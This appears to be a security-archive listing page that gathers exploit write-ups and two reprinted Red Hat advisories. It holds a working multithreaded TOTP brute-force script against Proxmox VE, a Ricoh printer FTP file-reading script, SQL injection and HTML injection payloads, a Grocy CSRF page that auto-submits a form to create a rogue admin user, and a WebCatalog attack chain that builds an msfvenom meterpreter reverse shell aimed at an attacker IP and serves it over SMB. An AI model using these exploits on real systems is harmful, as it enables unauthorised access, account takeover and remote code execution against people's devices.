Proxmox VE versions 5.4 through 7.4-1 suffer from a TOTP brute forcing vulnerability.

    # Exploit Title: Proxmox VE TOTP Brute Force# Date: 09/23/2023# Exploit Author: Cory Cline, Gabe Rust# Vendor Homepage: https://www.proxmox.com/en/# Software Link: http://download.proxmox.com/iso/# Version: 5.4 - 7.4-1# Tested on: Debian# CVE : CVE-2023-43320import timeimport requestsimport urllib.parseimport jsonimport osimport urllib3urllib3.disable_warnings()threads=25#################### REPLACE THESE VALUES #########################password="KNOWN PASSWORD HERE"username="KNOWN USERNAME HERE"target_url="https://HOST:PORT"##################################################################ticket=""ticket_username=""CSRFPreventionToken=""ticket_data={}auto_refresh_time = 20 # in minutes - 30 minutes before expirationlast_refresh_time = 0tokens = [];for num in range(0,1000000):    tokens.append(str(num).zfill(6))def refresh_ticket(target_url, username, password):    global CSRFPreventionToken    global ticket_username    global ticket_data    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"    refresh_ticket_cookies = {}    refresh_ticket_headers = {}    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)    ticket_data = json.loads(ticket_data_raw)    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]    ticket_username = ticket_data["data"]["username"]def attack(token):    global last_refresh_time    global auto_refresh_time    global target_url    global username    global password    global ticket_username    global ticket_data    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):        refresh_ticket(target_url, username, password)        last_refresh_time = int(time.time())    url = target_url + "/api2/extjs/access/ticket"    cookies = {}    headers = {"Csrfpreventiontoken": CSRFPreventionToken}    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)    if(len(response.text) > 350):        print(response.text)        os._exit(1)while(1):    refresh_ticket(target_url, username, password)    last_refresh_time = int(time.time())    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:        res = [executor.submit(attack, token) for token in tokens]        concurrent.futures.wait(res)

Proxmox VE 7.4-1 TOTP Brute Force

TP-LINK TL-WR740N suffers from an html injection vulnerability.

    # Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Shujaat Amin (ZEROXINN)# Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: Windows 10---------------------------POC-----------------------------1) Go to your routers IP (192.168.0.1)2) Go to Access control --> Target,rule3) Click on add new 5) Type <h1>Hello<h1> in Target Description box6) Click on Save, and now you can see html injection on the webpage

TP-LINK TL-WR740N HTML Injection

GoAhead Web Server version 2.5 suffers from an html injection vulnerability.

    # Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Syed Affan Ahmed (ZEROXINN)# Vendor Homepage: https://www.embedthis.com/goahead/# Affected Version: 2.5 may be others.# Tested On Version: 2.5 in ZTE AC3630---------------------------POC---------------------------GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.HTML Injection can cause the ability to execute within the context of that site.http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>

GoAhead Web Server 2.5 HTML Injection

Red Hat Security Advisory 2024-0647-03 - An update for rpm is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0647.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: rpm security updateAdvisory ID:        RHSA-2024:0647-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0647Issue date:         2024-02-01Revision:           03CVE Names:          CVE-2021-35937====================================================================Summary: An update for rpm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.Security Fix(es):* rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)* rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938)* rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-35937References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1964114https://bugzilla.redhat.com/show_bug.cgi?id=1964125https://bugzilla.redhat.com/show_bug.cgi?id=1964129

Red Hat Security Advisory 2024-0647-03

Red Hat Security Advisory 2024-0484-03 - Red Hat OpenShift Container Platform release 4.13.31 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0484.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.31 bug fix and security update  
Advisory ID:        RHSA-2024:0484-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0484  
Issue date:         2024-02-01  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.31 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.31. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:0488

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-44487) (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-22272  
https://issues.redhat.com/browse/OCPBUGS-24419  
https://issues.redhat.com/browse/OCPBUGS-26423  
https://issues.redhat.com/browse/OCPBUGS-27049  
https://issues.redhat.com/browse/OCPBUGS-27172  
https://issues.redhat.com/browse/OCPBUGS-27233  
https://issues.redhat.com/browse/OCPBUGS-27367  
https://issues.redhat.com/browse/OCPBUGS-27370  
https://issues.redhat.com/browse/OCPBUGS-27416  
https://issues.redhat.com/browse/OCPBUGS-27754

Red Hat Security Advisory 2024-0484-03

Ricoh printers suffer from directory and file exposure vulnerabilities.

    #Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023#Exploit Author: Thomas Heverin (Heverin Hacker)#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py#Version: Ricoh Printers - All Versions#Tested on: Windows#CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)from ftplib import FTPdef ftp_connect(ip):    try:        ftp = FTP(ip)        ftp.login("guest", "guest")        print(f"Connected to {ip} over FTP as 'guest'")        return ftp    except Exception as e:        print(f"Failed to connect to {ip} over FTP: {e}")        return Noneif __name__ == "__main__":    target_ip = input("Enter the Ricoh Printer IP address: ")        ftp_connection = ftp_connect(target_ip)    if ftp_connection:        try:            while True:                file_list = ftp_connection.nlst()                print("List of Ricoh printer files and directories:")                for index, item in enumerate(file_list, start=1):                    print(f"{index}. {item}")                                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1                if file_index < 0:                    break                                if 0 <= file_index < len(file_list):                    selected_file = file_list[file_index]                    lines = []                    ftp_connection.retrlines("RETR " + selected_file, lines.append)                    print(f"Contents of '{selected_file}':")                    for line in lines:                        print(line)                else:                    print("Invalid file index.")        except Exception as e:            print(f"Failed to perform operation: {e}")        finally:            ftp_connection.quit()

Ricoh Printer Directory / File Exposure

Typora version 1.7.4 suffers from a command injection vulnerability.

    # Exploit Title: Typora v1.7.4 - OS Command Injection# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 13.09.2023# Vendor Homepage: http://www.typora.io# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe# Tested Version: v1.7.4 (latest)# Tested on: Windows 2019 Server 64bit# # #  Steps to Reproduce # # ## Open the application# Click on Preferences from the File menu# Select PDF from the Export tab# Check the “run command” at the bottom right and enter your reverse shellcommand into the opened box# Close the page and go back to the File menu# Then select PDF from the Export tab and click Save# Reverse shell is ready!

Typora 1.7.4 Command Injection

Bank Locker Management System suffers from a remote SQL injection vulnerability.

    # Exploit Title: Bank Locker Management System - SQL Injection# Application: Bank Locker Management System# Date: 12.09.2023# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/# Tested on: Windows 10 64 bit Wampserver ## Description:This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.## Vulnerability Details:- **Application Name**: Bank Locker Management System- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)## Vulnerability Description:The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:Payload: admin' or '1'='1-- -An attacker can gain unauthorized access to the application with administrative privileges.## Proof of Concept (PoC):1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).2. Navigate to the "banker" directory: http://blms.local/banker/3. In the login and password fields, input the following payload:4. admin' or '1'='1-- -

Bank Locker Management System SQL Injection

Grocy versions 4.0.2 and below suffer from a cross site request forgery vulnerabilities.

    # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability# Application: Grocy# Version: <= 4.0.2# Date: 09/21/2023# Exploit Author: Chance Proctor# Vendor Homepage: https://grocy.info/# Software Link: https://github.com/grocy/grocy# Tested on: Linux# CVE : CVE-2023-42270Overview==================================================When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.Proof of Concept==================================================Host the following html code via a XSS or delivery via a phishing campaign:  <html>  <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">  <input name='username' value='hacker' type='hidden'>  <input name='password' value='test' type='hidden'>  <input type=submit>  </form>  <script>  history.pushState('','', '/');  document.forms[0].submit();  </script>  </html>If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials  Username: hacker  Password: testNote:In order for this to work, the target must have Create User Permissions.This is enabled by default.Proof of Exploit/Reproduce==================================================http://xploit.sh/posts/cve-2023-42270/

Grocy 4.0.2 Cross Site Request Forgery

WebCatalog versions prior to 48.8 call the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

    # Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution# Date: 9/27/2023# Exploit Author: ItsSixtyN3in# Vendor Homepage: https://webcatalog.io/en/# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe# Version: 48.4.0# Tested on: Windows# CVE : CVE-2023-42222Vulnerability summary:WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.Exploit details:-   Create a reverse shell file.msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)python3 smbserver.py Tools -smb2support-   Have the user sync a page with the payload as a renamed link[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)Payload:search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20TitleTobias DiehlSecurity ConsultantOSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300Pronouns: he/hime-mail:  tobias.diehl@bulletproofsi.com

Tag

#vulnerability